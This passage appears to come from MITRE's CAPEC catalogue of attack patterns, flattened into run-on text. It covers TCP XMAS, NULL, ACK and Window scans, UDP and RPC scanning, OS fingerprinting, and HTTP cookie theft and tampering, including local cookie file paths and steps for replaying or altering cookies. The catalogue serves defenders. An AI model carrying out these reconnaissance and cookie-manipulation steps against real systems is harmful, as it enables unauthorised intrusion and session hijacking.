TCP XMAS scanning was once stealthy, but is now easily detected by IDS/IPS systems 3. Open Port: Detects an open port via no response to the segment 4. Closed Port: Detects that a closed via a RST received in response to the FIN 5. Filtered Port: Cannot distinguish between a filtered port and an open port 6. Unfiltered Port: Cannot distinguish between an unfiltered port and a non-stateful filtered port XMAS scans are limited by the range of platforms against which they work. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, XMAS scanning a system protected by a stateful firewall may indicate all ports being open. Because of their obvious rule-breaking nature, XMAS scans are flagged by almost all intrusion prevention or intrusion detection systems. Transport Layer Server-side Host Service XMAS scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges. Low The ability to send TCP segments with every flag set to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities Availability Unexpected State 1000 Attack Pattern ChildOf 300 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References An attacker uses a TCP NULL scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with no flags in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. he major advantage of this scan type is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. NULL packets, like out-of-state FIN or ACK packets, tend to pass through such devices undetected. Many operating systems, however, do not implement RFC 793 exactly and for this reason NULL scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing an attacker from distinguishing between open and closed ports. 1. Speed: TCP NULL scanning is fast compared to other types of scans 2. Stealth: TCP NULL scanning was once stealthy, but is now easily detected by IDS/IPS systems 3. Open Port: Detects an open port via no response to the segment 4. Closed Port: Detects that a closed via a RST received in response to the FIN 5. Filtered Port: Cannot distinguish between a filtered port and an open port 6. Unfiltered Port: Cannot distinguish between an unfiltered port and a non-stateful filtered port NULL scans are limited by the range of platforms against which they work. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, NULL scanning a system protected by a stateful firewall may indicate all ports being open. Because of their obvious rule-breaking nature, NULL scans are flagged by almost all intrusion prevention or intrusion detection systems. Transport Layer Server-side Host Service NULL scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges. Low The ability to send TCP segments with no flags set to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 300 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References An attacker uses TCP ACK segments to gather information about firewall or ACL configuration. The purpose of this type of scan is to discover information about filter configurations rather than port state. This type of scanning is rarely useful alone, but when combined with SYN scanning, gives a more complete picture of the type of firewall rules that are present. When a TCP ACK segment is sent to a closed port, or sent out-of-sync to a listening port, the RFC 793 expected behavior is for the device to respond with a RST. Getting RSTs back in response to a ACK scan gives the attacker useful information that can be used to infer the type of firewall present. Stateful firewalls will discard out-of-sync ACK packets, leading to no response. When this occurs the port is marked as filtered. When RSTs are received in response, the ports are marked as unfiltered, as the ACK packets solicited the expected behavior from a port. When combined with SYN techniques an attacker can gain a more complete picture of which types of packets get through to a host and thereby map out its firewall rule-set. ACK scanning, when combined with SYN scanning, also allows the attacker analyze whether a firewall is stateful or non-stateful. If a SYN solicits a SYN/ACK or a RST and an ACK solicits a RST, the port is unfiltered by any firewall type. If a SYN solicits a SYN/ACK, but an ACK generates no response, the port is statefully filtered. When a SYN generates neither a SYN/ACK or a RST, but an ACK generates a RST, the port is statefully filtered. When neither SYN nor ACK generates any response, the port is blocked by a specific firewall rule, which can occur via any type of firewall. 1. Speed: TCP ACK scanning is fast compared to other types of scans 2. Stealth: TCP ACK scanning is stealthy 3. Open Port: Cannot detect open ports 4. Closed Port: Cannot detect closed ports 5. Filtered Port: Can detect stateful vs. non-stateful filters when combined with SYN probes 6. Unfiltered Port: Can detect unfiltered ports when combined with SYN probes Interpreting the results of ACK scanning requires rather sophisticated analysis. A skilled attacker may use this method to map out firewall rules, but the results of ACK scanning will be less useful to a novice. Transport Layer Server-side Host Firewall ACK scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges. Low The ability to send TCP ACK segments to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 300 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 55-56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 5.7 TCP ACK Scan, pg. 113 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References CAPEC Content Team MITRE 2014-02-06 Updated Description An attacker engages in TCP Window scanning to analyze port status and operating system type. TCP Window scanning uses the ACK scanning method but examine the TCP Window Size field of response RST packets to make certain inferences. This scanning method works against fewer TCP stack implementations than any other type of scan. Some operating systems return a positive TCP window size when a RST packet is sent from an open port, and a negative value when the RST originates from a closed port. 1. Speed: TCP Window scanning is fast compared to other types of scans 2. Stealth: TCP Window scanning is relatively stealthy, much like ACK scanning 3. Open Port: Can detect open ports based on Window size for a limited number of operating systems 4. Closed Port: Can detect closed ports based on Window size for limited number of operating systems 5. Filtered Port: Can identify filtered ports when combined with other methods 6. Unfiltered Port: Can identify unfiltered ports when combined with other methods TCP Window scanning is one of the most complex scan types, and its results are difficult to interpret. Window scanning alone rarely yields useful information, but when combined with other types of scanning is more useful. TCP Window scanning is a more reliable means of making inference about operating system versions than port status. Transport Layer Server-side Host Service TCP Window scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges. Low The ability to send TCP segments with a custom window size to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 300 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 55-56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 5.8 TCP Window Scan, pg. 115 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References An attacker scan for RPC services listing on a Unix/Linux host. This type of scan can be obtained via native operating system utilities or via port scanners like nmap. When performed by a scanner, an RPC datagram is sent to a list of UDP ports and the response is recorded. Particular types of responses can be indicative of well-known RPC services running on a UDP port. 1. Speed: Direct RPC scans that bypass portmapper/sunrpc are typically slow compare to other scan types 2. Stealth: RPC scanning is not stealthy, as IPS/IDS systems detect RPC queries 3. Open Port: Can only detect open ports when an RPC service responds 4. Closed Port: Detects closed ports on the basis of ICMP diagnostic messages. 5. Filtered Port: Cannot identify filtered ports 6. Unfiltered Port: Cannot identify unfiltered ports There are two general approaches to RPC scanning. One is to use a native operating system utility, or script, to query the portmapper/rpcbind application running on port 111. Portmapper will return a list of registered RPC services. Alternately, one can use a port scanner or script to scan for RPC services directly. Discovering RPC services gives the attacker potential targets to attack, as some RPC services are insecure by default. Transport Layer Server-side Host Service RPC scanning requires no special privileges when it is performed via a native system utility. Low The ability to craft custom RPC datagrams for use during network reconnaissance. By tailoring the bytes injected one can scan for specific RPC-registered services. Depending upon the method used it may be necessary to sniff the network in order to see the response. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 300 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 J. Postel RFC768 - User Datagram Protocol August 28, 1980 http://www.faqs.org/rfcs/rfc768.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 7.5.2 RPC Grinding, pg. 156 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker engages in UDP scanning to gather information about UDP port status. UDP scanning methods involve sending a UDP datagram to the target port and looking for evidence that the port is closed. Open UDP ports usually do not respond to UDP datagrams as there is no stateful mechanism within the protocol that requires building or establishing a session. Responses to UDP datagrams are therefore application specific and cannot be relied upon as a method of detecting an open port. UDP scanning relies heavily upon ICMP diagnostic messages in order to determine the status of a remote port. Firewalls or ACLs which block egress ICMP error types effectively prevent UDP scans from returning any useful information. UDP scanning is further complicated by rate limiting mechanisms governing ICMP error messages. During a UDP scan, a datagram is sent to a target port. If an ICMP Type 3 Port unreachable error message is returned then the port is considered closed. Different types of ICMP messages can indicate a filtered port. 1. Speed: UDP scanning is very slow due to ICMP rate limiting 2. Stealth: RPC scanning is relatively stealthy provided the sending rate does not trigger IPS/IDS sensors 3. Open Port: Infers an open port based on no response, or an occasional response by a well-known service 4. Closed Port: Detects a closed port using return ICMP diagnostic messages from the host 5. Filtered Port: Can detect some filtered ports via ICMP diagnostic messages 6. Unfiltered Port: Can detect unfiltered ports based on some ICMP diagnostic messages The protocol characteristics of UDP make port scanning inherently more difficult than with TCP, as well as dependent upon ICMP for accurate scanning. Due to ambiguities that can arise between open ports and filtered ports, UDP scanning results often require a high degree of interpretation and further testing to refine. In general, UDP scanning results are less reliable or accurate than TCP-based scanning. Network Layer Server-side Host Service The ability to send UDP datagrams to a host and receive ICMP error messages from that host. In cases where particular types of ICMP messaging is disallowed, the reliability of UDP scanning drops off sharply. Low The ability to craft custom UDP Packets for use during network reconnaissance. This can be accomplished via the use of a port scanner, or via socket manipulation in a programming or scripting language. Packet injection tools are also useful. It is also necessary to trap ICMP diagnostic messages during this process. Depending upon the method used it may be necessary to sniff the network in order to see the response. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 300 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 54-69 6th Edition McGraw Hill 2009 J. Postel RFC768 - User Datagram Protocol August 28, 1980 http://www.faqs.org/rfcs/rfc768.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 5.4 RPC Grinding, pg. 101 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References An attacker engages in scanning activity to find vulnerable network nodes, such as hosts, devices, or routes. Attackers usually perform this type of network reconnaissance during the early stages of attack against an external network. Many types of scanning utilities are typically employed, including ICMP tools, network mappers, port scanners, and route testing utilities such as traceroute. Network Layer Transport Layer Application Layer Server-side Host Service Uses Protocol Uses Protocol Uses Protocol Uses Protocol None Low Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication. Confidentiality "Varies by context" 1000 Attack Pattern ChildOf 289 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References, Target_Functional_Services This attack relies on the use of HTTP Cookies to store credentials, state information and other critical data on client systems. The first form of this attack involves accessing HTTP Cookies to mine for potentially sensitive data contained therein. The second form of this attack involves intercepting this data as it is transmitted from client to server. This intercepted information is then used by the attacker to impersonate the remote user/session. The third form is when the cookie's content is modified by the attacker before it is sent back to the server. Here the attacker seeks to convince the target server to operate on this falsified information. Obtain copy of cookie The attacker first needs to obtain a copy of the cookie. The attacker may be a legitimate end user wanting to escalate privilege, or could be somebody sniffing on a network to get a copy of HTTP cookies. Obtain cookie from local filesystem (e.g. C:\Documents and Settings\*\Cookies and C:\Documents and Settings\*\Application Data\Mozilla\Firefox\Profiles\*\cookies.txt in Windows) env-Web Sniff cookie using a network sniffer such as Wireshark env-Web Obtain cookie from local memory or filesystem using a utility such as the Firefox Cookie Manager or AnEC Cookie Editor. env-Web Steal cookie via a cross-site scripting attack. env-Web Guess cookie contents if it contains predictable information. env-Web Cookies used in web application. env-Web Cookies not used in web application. env-Web Cookie captured by attacker. Cookie cannot be captured by attacker. To prevent network sniffing, cookies should be transmitted over HTTPS and not plain HTTP. To enforce this on the client side, the "secure" flag should be set on cookies (javax.servlet.http.Cookie.setSecure() in Java, secure flag in setcookie() function in php, etc.). Obtain sensitive information from cookie The attacker may be able to get sensitive information from the cookie. The web application developers may have assumed that cookies are not accessible by end users, and thus, may have put potentially sensitive information in them. If cookie shows any signs of being encoded using a standard scheme such as base64, decode it. env-Web Analyze the cookie's contents to determine whether it contains any sensitive information. env-Web Cookie only contains a random session ID (e.g. ASPSESSIONID, JSESSIONID, etc.) env-Web Cookie contains sensitive information (e.g. "ACCTNO=0234234", or "DBIP=0xaf112a22" -- database server's IP address). env-Web Cookie's contents cannot be deciphered. env-Web Cookie contains sensitive information that developer did not intent the end user to see. Cookie does not contain any sensitive information. Do not store sensitive information in cookies unless they are encrypted such that only the server can decrypt them. Modify cookie to subvert security controls. The attacker may be able to modify or replace cookies to bypass security controls in the application. Modify logical parts of cookie and send it back to server to observe the effects. env-Web Modify numeric parts of cookie arithmetically and send it back to server to observe the effects. env-Web Modify cookie bitwise and send it back to server to observe the effects. env-Web Replace cookie with an older legitimate cookie and send it back to server to observe the effects. This technique would be helpful in cases where the cookie contains a "points balance" for a given user where the points have some value. The user may spend his points and then replace his cookie with an older one to restore his balance. env-Web Subversion of security controls on server Cookie reset by server Web server logs contain many messages indicating that invalid cookies were received from client. Cookies should not contain any information that the user is not allowed to modify, unless that information is never expected to change. In the latter case, the integrity of the cookie should be protected using a digital signature or a message authentication code. Target server software must be a HTTP daemon that relies on cookies. High High Modification of Resources API Abuse Protocol Manipulation Time and State There are two main attack vectors for exploiting poorly protected session variables like cookies. One is the local machine itself which can be exploited directly at the physical level or indirectly through XSS and phishing. In addition, the man in the middle attack relies on a network sniffer, proxy, or other intermediary to intercept the subject's credentials and use them to impersonate the digital subject on the host. The issue is that once the credentials are intercepted, impersonation is trivial for the attacker to accomplish if no other protection mechanisms are in place. Low To overwrite session cookie data, and submit targeted attacks via HTTP High Exploiting a remote buffer overflow generated by attack Ability to send HTTP request containing cookie to server Design: Use input validation for cookies Design: Generate and validate MAC for cookies Implementation: Use SSL/TLS to protect cookie in transit Implementation: Ensure the web server implements all relevant security patches, many exploitable buffer overflows are fixed in patches issued for the software. Confidentiality Read application data Integrity Modify application data Confidentiality Access_Control Authorization Gain privileges / assume identity HTTP cookie Malicious input delivered through cookie in HTTP Request. Client software, such as a browser and its component libraries, or an intermediary Enables attacker to leverage state stored in cookie Enables attacker a vector to attack web server and platform 565 Targeted 302 Targeted 311 Targeted 113 Targeted 539 Targeted 20 Targeted 315 Targeted 384 Targeted 472 Secondary 724 Targeted 602 Targeted 642 Targeted 1000 Attack Pattern ChildOf 39 1000 Attack Pattern ChildOf 21 1000 Category ChildOf 255 1000 Attack Pattern ChildOf 117 1000 Category ChildOf 262 Exploitation High High Low Client-Server n-Tier All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.31.1][REF-2] Cigital, Inc 2007-01-01 [R.31.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow MITRE Content Team MITRE 2013-06-21 Updated Skill_or_Knowledge_Level and Skill_or_Knowledge_Type Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances An attacker engages in scanning activity to find vulnerable software versions or types, such as operating system versions or network services. Vulnerable or exploitable network configurations, such as improperly firewalled systems, or misconfigured systems in the DMZ or external network, provide windows of opportunity for an attacker. Common types of vulnerable software include unpatched operating systems or services (e.g FTP, Telnet, SMTP, SNMP) running on open ports that the attacker has identified. Attackers usually begin probing for vulnerable software once the external network has been port scanned and potential targets have been revealed. Network Layer Transport Layer Application Layer Server-side Host Service Uses Protocol Uses Protocol Uses Protocol Uses Protocol Access to the network on which the targeted system resides. Software tools used to probe systems over a range of ports and protocols. Low Medium To probe a system remotely without detection requires careful planning and patience. Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 286 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, References, Target_Functional_Services An attacker engages in fingerprinting activity to determine the type or version of the operating system of the remote target. Any platform, device, or server that communicates over the network will conform to one or more protocols, commonly TCP/IP and related protocols. Fingerprinting remote operating systems involves taking an "active" or a "passive" approach. Active approaches to fingerprinting involve sending data packets that break the logical or semantic rules of a protocol and observing operating system response to artificial inputs. Passive approaches involve listening to the communication of one or more nodes and identifying the operating system or firmware of the devices involved based on the structure of their messages. Network Layer Transport Layer Application Layer Server-side Host Service Uses Protocol Uses Protocol Uses Protocol Uses Protocol None Low Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 310 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References, Target_Functional_Services An attacker engages in activity to detect the operating system or firmware version of a remote target by interrogating a device, server, or platform with a probe designed to solicit behavior that will reveal information about the operating systems or firmware in the environment. Operating System detection is possible because implementations of common protocols (Such as IP or TCP) differ in distinct ways. While the implementation differences are not sufficient to 'break' compatibility with the protocol the differences are detectable because the target will respond in unique ways to specific probing activity that breaks the semantic or logical rules of packet construction for a protocol. Different operating systems will have a unique response to the anomalous input, providing the basis to fingerprint the OS behavior. This type of OS fingerprinting can distinguish between operating system types and versions. Network Layer Server-side Host Uses Protocol Uses Protocol Uses Protocol Uses Protocol The ability to send and receive packets from a remote target, or the ability to passively monitor network communications. Low Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges. Installing a listener on the network requires access to at least one host, and the privileges to interface with the network interface card. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 311 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References, Target_Functional_Services CAPEC Content Team MITRE 2014-02-06 Updated Resources_Required An attacker engages in activity to detect the version or type of OS software in a an environment by passively monitoring communication between devices, nodes, or applications. Passive techniques for operating system detection send no actual probes to a target, but monitor network or client-server communication between nodes in order to identify operating systems based on observed behavior as compared to a database of known signatures or values. While passive OS fingerprinting is not usually as reliable as active methods it is more stealthy. Network Layer Transport Layer Application Layer Server-side Host Uses Protocol Uses Protocol Uses Protocol Uses Protocol The ability to send and receive packets from a remote target, or the ability to passively monitor network communications. Low Installing a listener on the network requires access to at least one host, and the privileges to interface with the network device. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 311 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References, Target_Functional_Services An attacker engages in IP-based techniques for the purpose of fingerprinting operating systems on the network. By interrogating a particular IP stack implementation with IP segments that deviate from the ordinary or expected rules of RFC 791, an attacker can construct a fingerprint of unique behaviors for the target operating system. When this set of behaviors is analyzed against a database of known fingerprints, an attacker can make reliable inferences about the operating system type and version. Network Layer Server-side Host Uses Protocol The ability to send and receive TCP segments from a target in order to identify a particular TCP stack implementation. Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 312 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References An attacker engages in TCP stack fingerprinting techniques to determine the type and version of operating systems on the network. TCP Fingerprinting involves manipulating portions of the TCP header or other characteristics in order to elicit a unique and identifiable response from an operating system. This response is compared against a database of known operating system fingerprints and a guess about the operating system type and version is made. Network Layer Transport Layer Application Layer Server-side Host Service Uses Protocol Uses Protocol Uses Protocol Uses Protocol The ability to send and receive TCP segments from a target in order to identify a particular TCP stack implementation. Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 312 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References, Target_Functional_Services An attacker engages in ICMP stack fingerprinting techniques to determine the operating system type and version of a remote target. The role of ICMP as an ubiquitous diagnostic messaging protocol means that ICMP fingerprinting techniques are applicable to almost any internet host in a similar manner as TCP. ICMP fingerprinting techniques involve the generation of ICMP messages and analyzing the responses. This method is limited in that most firewalls are configured to block ICMP messages for security reasons, so it is most effective when used on an internal network segment. OS fingerprints using ICMP usually involve multiple different probes as the information returned from any one probe is usually insufficient to support a reliable 